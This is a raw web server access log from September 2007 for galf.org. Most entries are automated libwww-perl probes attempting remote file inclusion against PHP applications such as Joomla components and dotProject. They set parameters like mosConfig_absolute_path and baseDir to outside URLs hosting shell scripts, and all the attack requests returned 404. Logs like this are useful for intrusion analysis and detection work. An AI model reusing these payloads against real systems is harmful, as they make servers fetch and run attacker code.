66.7.201.127 - - [02/Sep/2007:18:09:28 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.84.142.91 - - [02/Sep/2007:18:10:14 -0700] "GET /logs/access_070716.log/calendar.php?baseDir=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
88.84.142.91 - - [02/Sep/2007:18:10:14 -0700] "GET /calendar.php?baseDir=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.84.142.91 - - [02/Sep/2007:18:10:15 -0700] "GET /logs/calendar.php?baseDir=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.110.144.106 - - [02/Sep/2007:18:12:26 -0700] "GET /logs/!scanhttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.110.144.106 - - [02/Sep/2007:18:12:27 -0700] "GET /!scanhttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
83.13.80.62 - - [02/Sep/2007:18:13:21 -0700] "GET /logs/!scanhttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.13.80.62 - - [02/Sep/2007:18:13:22 -0700] "GET /!scanhttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.207.110.14 - - [02/Sep/2007:18:14:46 -0700] "GET /logs//include.php?path%5Bdocroot%5D=http://atlant.ru/calendar/img/karma? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.207.110.14 - - [02/Sep/2007:18:14:46 -0700] "GET //include.php?path%5Bdocroot%5D=http://atlant.ru/calendar/img/karma? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.13.80.62 - - [02/Sep/2007:18:15:48 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.13.80.62 - - [02/Sep/2007:18:15:49 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.110.144.106 - - [02/Sep/2007:18:16:11 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
217.110.144.106 - - [02/Sep/2007:18:16:12 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.89.81.231 - - [02/Sep/2007:18:16:46 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.89.81.231 - - [02/Sep/2007:18:16:51 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.207.110.14 - - [02/Sep/2007:18:20:28 -0700] "GET /logs/access.log//include.php?path%5Bdocroot%5D=http://atlant.ru/calendar/img/karma? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.207.110.14 - - [02/Sep/2007:18:20:48 -0700] "GET /logs/access_070716.log//include.php?path%5Bdocroot%5D=http://atlant.ru/calendar/img/karma? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
85.214.39.233 - - [02/Sep/2007:18:23:39 -0700] "GET /logs/access_070827.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://hl47.dinaserver.com/hosting/ux0.eu/ux0/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.39.233 - - [02/Sep/2007:18:23:39 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://hl47.dinaserver.com/hosting/ux0.eu/ux0/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.39.233 - - [02/Sep/2007:18:23:39 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://hl47.dinaserver.com/hosting/ux0.eu/ux0/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.7.201.127 - - [02/Sep/2007:18:24:28 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.201.127 - - [02/Sep/2007:18:24:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.55.181.39 - - [02/Sep/2007:18:27:33 -0700] "GET /logs/access_070827.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://hl47.dinaserver.com/hosting/ux0.eu/ux0/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
216.55.181.39 - - [02/Sep/2007:18:27:33 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://hl47.dinaserver.com/hosting/ux0.eu/ux0/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
216.55.181.39 - - [02/Sep/2007:18:27:33 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://hl47.dinaserver.com/hosting/ux0.eu/ux0/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.207.110.14 - - [02/Sep/2007:18:29:10 -0700] "GET /logs/access_070820.log//include.php?path%5Bdocroot%5D=http://atlant.ru/calendar/img/karma? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
213.207.110.14 - - [02/Sep/2007:18:29:11 -0700] "GET /logs/access_070806.log//include.php?path%5Bdocroot%5D=http://atlant.ru/calendar/img/karma? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.32.5.203 - - [02/Sep/2007:18:30:22 -0700] "GET /calendar.php?baseDir=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.246.158.53 - - [02/Sep/2007:18:32:57 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
195.246.158.53 - - [02/Sep/2007:18:32:57 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.102.10.236 - - [02/Sep/2007:18:35:17 -0700] "GET /logs/access_070625.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.192.81.54 - - [02/Sep/2007:18:35:33 -0700] "GET /logs/access.log/plugin.class.php?mosConfig_absolute_path=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.192.81.54 - - [02/Sep/2007:18:35:33 -0700] "GET /plugin.class.php?mosConfig_absolute_path=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.192.81.54 - - [02/Sep/2007:18:35:33 -0700] "GET /logs/plugin.class.php?mosConfig_absolute_path=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.13.80.62 - - [02/Sep/2007:18:35:59 -0700] "GET /logs/adminfoot.php?path[docroot]=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.13.80.62 - - [02/Sep/2007:18:36:00 -0700] "GET /adminfoot.php?path[docroot]=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.196.115 - - [02/Sep/2007:18:36:34 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.230.196.115 - - [02/Sep/2007:18:36:34 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.149.196.204 - - [02/Sep/2007:18:42:02 -0700] "GET /logs/access_070716.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://img53.imageshack.us/img53/917/osruntb5.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.150.243.10 - - [02/Sep/2007:18:44:02 -0700] "GET /logs/adminfoot.php?path[docroot]=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.150.243.10 - - [02/Sep/2007:18:44:03 -0700] "GET /adminfoot.php?path[docroot]=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
67.166.219.59 - - [02/Sep/2007:18:45:45 -0700] "GET / HTTP/1.1" 200 1048 "http://www.lesbianas.tv/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3)" "www.galf.org"
67.166.219.59 - - [02/Sep/2007:18:45:46 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3)" "www.galf.org"
209.85.109.6 - - [02/Sep/2007:18:46:32 -0700] "GET //index.php?x=http://yigw.sntcm.edu.cn/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.193.162 - - [02/Sep/2007:18:46:34 -0700] "GET //index.php?x=http://yigw.sntcm.edu.cn/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.234.248.64 - - [02/Sep/2007:18:48:02 -0700] "GET //index.php?x=http://yigw.sntcm.edu.cn/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.230.196.115 - - [02/Sep/2007:18:54:28 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.230.196.115 - - [02/Sep/2007:18:54:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.201.127 - - [02/Sep/2007:18:54:55 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.201.127 - - [02/Sep/2007:18:54:56 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.246.158.53 - - [02/Sep/2007:18:54:57 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.246.158.53 - - [02/Sep/2007:18:54:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:18:55:05 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:18:55:06 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.233.186 - - [02/Sep/2007:18:55:23 -0700] "GET /logs/access_070702.log//include/wysiwyg/spaw_control.class.php?spaw_root=http://atlant.ru/calendar/img/karma? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:18:56:10 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:18:56:10 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.225.47.200 - - [02/Sep/2007:18:56:47 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.google.com/search?q=intitle%3A%22index+of%22++labia&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "galf.org"
70.225.47.200 - - [02/Sep/2007:18:56:48 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "galf.org"
74.52.233.186 - - [02/Sep/2007:18:56:59 -0700] "GET /logs/access_070806.log//include/wysiwyg/spaw_control.class.php?spaw_root=http://atlant.ru/calendar/img/karma? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.214.90 - - [02/Sep/2007:19:04:35 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.214.90 - - [02/Sep/2007:19:04:36 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.50.173.210 - - [02/Sep/2007:19:05:42 -0700] "GET /logs/access.log%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/.xpl/rst? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.55.208.227 - - [02/Sep/2007:19:08:58 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.227 - - [02/Sep/2007:19:08:59 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
195.246.158.53 - - [02/Sep/2007:19:14:02 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.246.158.53 - - [02/Sep/2007:19:14:02 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.196.115 - - [02/Sep/2007:19:17:13 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.230.196.115 - - [02/Sep/2007:19:17:13 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.32.5.203 - - [02/Sep/2007:19:20:41 -0700] "GET /logs/access_070716.log/calendar.php?baseDir=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.32.5.203 - - [02/Sep/2007:19:20:42 -0700] "GET /logs/calendar.php?baseDir=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.79.181.23 - - [02/Sep/2007:19:20:47 -0700] "GET /logs/index.php?go=http://www.trezze.epac.to/Scan_bot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.79.181.23 - - [02/Sep/2007:19:20:47 -0700] "GET /index.php?go=http://www.trezze.epac.to/Scan_bot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
82.192.81.54 - - [02/Sep/2007:19:29:17 -0700] "GET /logs/access_070604.log/index.php?cmd=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.192.81.54 - - [02/Sep/2007:19:29:17 -0700] "GET /index.php?cmd=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.192.81.54 - - [02/Sep/2007:19:29:18 -0700] "GET /logs/index.php?cmd=http://trezze.x24hr.com/Scan_BoT/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [02/Sep/2007:19:30:48 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
83.170.97.200 - - [02/Sep/2007:19:30:49 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.170.97.200 - - [02/Sep/2007:19:30:49 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.36.249.209 - - [02/Sep/2007:19:32:57 -0700] "GET /logs/admin_modules/admin_module_rotimage.inc.php?http://coyoote.iespana.es/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
201.36.249.209 - - [02/Sep/2007:19:32:58 -0700] "GET /logs/admin_modules/admin_module_captions.inc.php?http://coyoote.iespana.es/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
201.36.249.209 - - [02/Sep/2007:19:32:58 -0700] "GET /admin_modules/admin_module_rotimage.inc.php?http://coyoote.iespana.es/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
201.36.249.209 - - [02/Sep/2007:19:32:59 -0700] "GET /logs/admin_modules/admin_module_delimage.inc.php?http://toshop.or.kr/zeroboard-02/locus.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
201.36.249.209 - - [02/Sep/2007:19:33:00 -0700] "GET /admin_modules/admin_module_delimage.inc.php?http://toshop.or.kr/zeroboard-02/locus.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
71.191.39.114 - - [02/Sep/2007:19:33:30 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.google.com/search?hl=en&q=%22parent+directory+%22+labia+-xxx+-html+-htm+-php+-shtml+-opendivx+-md5+-md5sums&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "galf.org"
71.191.39.114 - - [02/Sep/2007:19:33:30 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "galf.org"
66.7.201.127 - - [02/Sep/2007:19:41:49 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.201.127 - - [02/Sep/2007:19:41:49 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:19:43:31 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:19:43:31 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:19:44:27 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:19:44:27 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:19:45:11 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:19:45:11 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.59.17.169 - - [02/Sep/2007:19:50:01 -0700] "GET /logs/index2.php?x=http://www.trezze.epac.to/Scan_bot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.59.17.169 - - [02/Sep/2007:19:50:01 -0700] "GET /index2.php?x=http://www.trezze.epac.to/Scan_bot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.10 - - [02/Sep/2007:19:53:30 -0700] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.38.59.34 - - [02/Sep/2007:19:55:04 -0700] "GET /logs/sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://rootssearch.net/jan.cok? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.38.59.34 - - [02/Sep/2007:19:55:05 -0700] "GET /sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://rootssearch.net/jan.cok? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
83.170.97.200 - - [02/Sep/2007:19:56:39 -0700] "GET /logs/access_070716.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.24.101 - - [02/Sep/2007:19:57:27 -0700] "GET /logs/?D=A HTTP/1.0" 200 5069 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.7.201.127 - - [02/Sep/2007:19:58:40 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.201.127 - - [02/Sep/2007:19:58:40 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:20:03:22 -0700] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:20:03:22 -0700] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:20:03:22 -0700] "GET //dotproject/includes/db_adodb.php?baseDir=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:20:03:22 -0700] "GET //dotproject/includes/db_adodb.php?baseDir=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:20:05:53 -0700] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:20:05:53 -0700] "GET //dotproject/includes/db_adodb.php?baseDir=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.249.79.70 - - [02/Sep/2007:20:06:27 -0700] "GET /logs/index.php?go=http://www.therealflow.net/foro/style_images/cvv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.249.79.70 - - [02/Sep/2007:20:06:27 -0700] "GET /index.php?go=http://www.therealflow.net/foro/style_images/cvv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.28.173 - - [02/Sep/2007:20:08:25 -0700] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
85.214.28.173 - - [02/Sep/2007:20:08:25 -0700] "GET //dotproject/includes/db_adodb.php?baseDir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.64.87.72 - - [02/Sep/2007:20:08:47 -0700] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://www.h2oclan.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.87.72 - - [02/Sep/2007:20:08:47 -0700] "GET //dotproject/includes/db_adodb.php?baseDir=http://www.h2oclan.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
